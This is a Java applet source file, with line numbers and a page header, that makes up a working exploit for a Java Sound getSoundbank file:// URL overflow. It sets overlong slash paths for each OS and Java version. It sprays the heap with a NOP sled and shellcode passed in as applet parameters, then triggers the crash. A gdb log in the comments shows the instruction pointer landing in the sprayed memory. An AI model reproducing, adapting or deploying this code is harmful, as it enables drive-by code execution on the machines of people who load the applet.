Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1

2
import javax.sound.midi.*;
3
import java.io.*;
4
import java.nio.*;
5
import java.net.*;
6

7
/*
8
 * 
9
 * comments from KF on Mac OS X:
10
 * 
11
Spray heap
12

13
Invalid memory access of location 0000000f eip=90909090
14

15
Program received signal EXC_BAD_ACCESS, Could not access memory.
16
Reason: KERN_PROTECTION_FAILURE at address: 0x0000000f
17
[Switching to process 385 thread 0x15107]
18
0x90909090 in _NSReadAttributedStringFromURLOrData ()
19
(gdb) bt
20
#0  0x90909090 in _NSReadAttributedStringFromURLOrData ()
21
#1  0x255a255a in ?? ()
22
 * 
23
 */
24

25
public class AppletX extends java.applet.Applet 
26
{
27
	private IntBuffer [] mem;
28
	
29
	public void init() 
30
	  {
31
		  String fName = "";
32
		  
33
		  fName = repeat('/', 303);
34

35
		  // detect OS
36
		  String os = System.getProperty("os.name").toLowerCase();
37
		  if (os.indexOf( "win" ) >= 0)
38
			 fName = repeat('/', 302); // 1.6.0_u16,u11
39
		  	 // fName = repeat('/', 304); // 1.5.0_u21 (problems lurking)
40
		  else if (os.indexOf( "mac" ) >= 0)
41
			 //fName = repeat('/',1118); // OSX Snow Leopard
42
			 fName = repeat('/',1080); // OSX Leopard
43
		  else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0)
44
			 fName = repeat('/', 1337); // not tested
45
		  else
46
			 // not supported
47
			 return;
48
		  
49
		  // heap sprayed info starts at 0x25580000+12 but we need to be fairly ascii safe. 0x80 will not fly
50
		  // fName = "file://" + fName + "$\"$\"$\"$\"$\"$\""; // 1.5.x
51
		  fName = "file://" + fName + "Z%Z%Z%Z%Z%Z%";
52
		  
53
		  // trigger vuln
54
		  try
55
			 {
56
				 mem = spray(getParameter("sc"), getParameter("np"));
57
				 // System.out.println("Sprayed!");
58

59
				 MidiSystem.getSoundbank(new URL(fName));
60
				 
61
				 // just in case, thread doesn't typically return from above :)
62
				 while (true)
63
					{
64
						Thread.sleep(10);
65
					}
66
			 }
67
		  catch(Exception e)
68
			 {
69
				 System.out.println(e);
70
			 }
71
	  }
72
	
73
	
74
	public static String repeat(char c,int i)
75
	  {
76
		  String tst = "";
77

78
		  for (int j = 0; j < i; j++)
79
			 {
80
				 tst = tst+c;
81
			 }
82
		  return tst;
83
	  }
84

85

86
   // based on:
87
	// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
88
	public static short[] HexDecode(String s)
89
	  {
90
		  short[] data = new short[s.length()/2];
91
		  
92
		  for (int i = 0; i < s.length(); i += 2)
93
			 {
94
				 char c1 = s.charAt(i);
95
				 char c2 = s.charAt(i + 1);
96
				 
97
				 int comb = Character.digit(c1, 16) & 0xff;
98
				 comb <<= 4;
99
				 comb += Character.digit(c2, 16) & 0xff;
100
				 data[i/2] = (short)comb;
101
			 }
102
		  return data;
103
	  }
104
	
105
	public final IntBuffer [] spray(String sc, String np)
106
	  {
107
		  short [] sc_bytes = HexDecode(sc);
108
		  short [] np_bytes = HexDecode(np);
109
		  
110
		  return spray (sc_bytes, np_bytes);
111
	  }
112
	
113
	public final IntBuffer [] spray(short[] sc, short[] np)
114
	  {
115
		  int cnt = 50; // total 50 mb
116
		  int sz = 1024*1024; // 1 mb
117
		  int nops = (sz / 4) - (sc.length);
118
		  
119
		  IntBuffer [] ret = new IntBuffer[cnt];
120
		  
121
		  for (int bi = 0; bi < cnt; bi++)
122
			 {
123
				 IntBuffer ib = IntBuffer.allocate(sz / 4);
124

125
				 for (int i = 0; i < nops; ++i)
126
					ib.put((np[0]
127
							  | (np[1] << 8)
128
							  | (np[2] << 16)
129
							  | (np[3] << 24)));
130
				 // ib.put(0x90909090);
131
		  
132
				 for (int i = 0; i < sc.length; )
133
					ib.put((sc[i++]
134
							  | (sc[i++] << 8)
135
							  | (sc[i++] << 16)
136
							  | (sc[i++] << 24)));
137
				 ret[bi] = ib;
138
			 }
139
		  return ret;
140
	  }
141
}
142

143

144